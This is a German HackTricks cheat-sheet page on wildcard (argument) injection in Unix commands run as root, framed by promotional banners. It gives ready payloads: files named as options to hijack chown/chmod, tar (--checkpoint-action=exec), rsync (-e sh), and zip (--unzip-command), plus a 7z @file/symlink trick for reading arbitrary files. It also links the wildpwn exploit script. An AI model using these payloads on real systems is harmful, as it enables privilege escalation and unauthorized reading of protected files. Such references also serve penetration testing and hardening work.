5.1 KiB
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.
chown, chmod
Sie können angeben, welchen Dateibesitzer und welche Berechtigungen Sie für den Rest der Dateien kopieren möchten.
touch "--reference=/my/own/path/filename"
Sie können dies mit https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (kombinierter Angriff) ausnutzen. Weitere Informationen finden Sie unter https://www.exploit-db.com/papers/33930
Tar
Beliebige Befehle ausführen:
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
Sie können dies mit https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar attack) ausnutzen. Weitere Informationen finden Sie unter https://www.exploit-db.com/papers/33930
Rsync
Beliebige Befehle ausführen:
Interesting rsync option from manual:
-e, --rsh=COMMAND specify the remote shell to use
--rsync-path=PROGRAM specify the rsync to run on remote machine
touch "-e sh shell.sh"
Sie können dies mit https://github.com/localh0t/wildpwn/blob/master/wildpwn.py ausnutzen (rsync-Angriff)
Weitere Informationen finden Sie unter https://www.exploit-db.com/papers/33930
7z
In 7z können Sie sogar mit --
vor *
(beachten Sie, dass --
bedeutet, dass die folgende Eingabe nicht als Parameter behandelt werden kann, sondern nur als Dateipfade in diesem Fall) einen beliebigen Fehler verursachen, um eine Datei zu lesen. Wenn also ein Befehl wie der folgende von root ausgeführt wird:
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
Und Sie können Dateien im Ordner erstellen, in dem dies ausgeführt wird. Sie könnten die Datei @root.txt
und die Datei root.txt
erstellen, wobei root.txt
ein Symbolischer Link auf die Datei ist, die Sie lesen möchten:
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt
Dann, wenn 7z ausgeführt wird, behandelt es root.txt
als eine Datei, die die Liste der Dateien enthält, die es komprimieren soll (das zeigt die Existenz von @root.txt
an) und wenn 7z root.txt
liest, liest es /file/you/want/to/read
und da der Inhalt dieser Datei keine Liste von Dateien ist, wird ein Fehler angezeigt und der Inhalt wird angezeigt.
Weitere Informationen finden Sie in den Write-ups der Box CTF von HackTheBox.
Zip
Beliebige Befehle ausführen:
zip name.zip files -T --unzip-command "sh -c whoami"
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.